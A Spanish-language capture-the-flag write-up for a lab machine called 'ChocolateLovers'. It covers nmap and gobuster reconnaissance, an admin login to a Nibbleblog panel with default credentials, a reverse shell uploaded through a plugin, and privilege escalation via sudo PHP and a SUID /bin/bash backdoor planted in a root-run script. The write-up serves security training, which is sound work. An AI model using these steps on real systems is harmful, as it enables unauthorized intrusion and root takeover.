ChocolateLovers
✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil 📅 Fecha de creación: 26/04/2024
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 172.17.0.2
para verificar la conectividad de red.

A continuación, realizamos el comando:
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 80 perteneciente al servicio HTTP está abierto por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p80 -v 172.17.0.2
para que nos proporcione más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web por defecto de Apache.

Revisando el código fuente nos encontramos un directorio comentado llamado /nibbleblog
.


Ahora buscaremos directorios con la herramienta Gobuster a través de:
gobuster dir -u http://172.17.0.2/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Nos intentamos loguear con credenciales por defecto admin:admin y estamos dentro.

🚀 EXPLOTACIÓN
Entramos en plugins en instalar My image y subimos una Reverse Shell.

Investigamos donde se ha subido el archivo y nos ponemos en escucha.

nc -lvnp 443

Hacemos el tratamiento de la TTY para trabajar más cómodos.
🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar.

sudo -u chocolate php -r "system('/bin/bash');"
Ahora ya somos el usuario chocolate pero no somos root. Si nos damos cuenta los procesos que están corriendo hay uno que es muy raro.
ps -faux

El archivo no contiene información útil, pero como el usuario chocolate
es propietario, podemos modificarlo para incluir código PHP malicioso que se ejecute como root, creando una puerta trasera para escalar privilegios.
echo "<?php system('chmod +s /bin/bash'); ?>" > script.php

Ya tenemos permisos SUID y ahora los explotamos. Ya somos root.
/bin/bash -p

Last updated
Was this helpful?